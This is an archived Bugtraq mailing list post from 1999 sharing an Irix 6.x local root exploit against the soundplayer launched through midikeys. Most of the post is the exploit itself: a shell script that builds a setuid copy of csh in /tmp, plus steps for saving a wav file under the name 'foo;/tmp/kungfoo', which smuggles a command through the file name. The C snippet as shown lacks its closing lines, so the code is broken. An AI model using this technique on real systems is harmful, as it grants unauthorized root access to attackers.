Home page logo

bugtraq logo Bugtraq mailing list archives

From: loneguard () CRAZYMONKEY ORG (Loneguard)
Date: Fri, 31 Dec 1999 03:22:20 -0800

midikeys might not setuid these days but you get the idea...

# Irix 6.x soundplayer xploit - Loneguard 20/02/99
# Good example of how bad coding in a non-setuid/priviledged process
# can offer up rewt
cat > /tmp/crazymonkey.c << 'EOF'
main() {
        system("cp /bin/csh /tmp/xsh;chmod 4755 /tmp/xsh");
cc -o /tmp/kungfoo crazymonkey.c
/usr/sbin/midikeys &
echo "You should now see the midikeys window, goto the menu that allows you to play sounds and load a wav. This will 
bring up a soundplayer window. Save the wav as 'foo;/tmp/kungfoo' and go find a rewt shell in tmp"

  By Date           By Thread  

Current thread:
  • irix-soundplayer.sh Loneguard (Dec 31)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]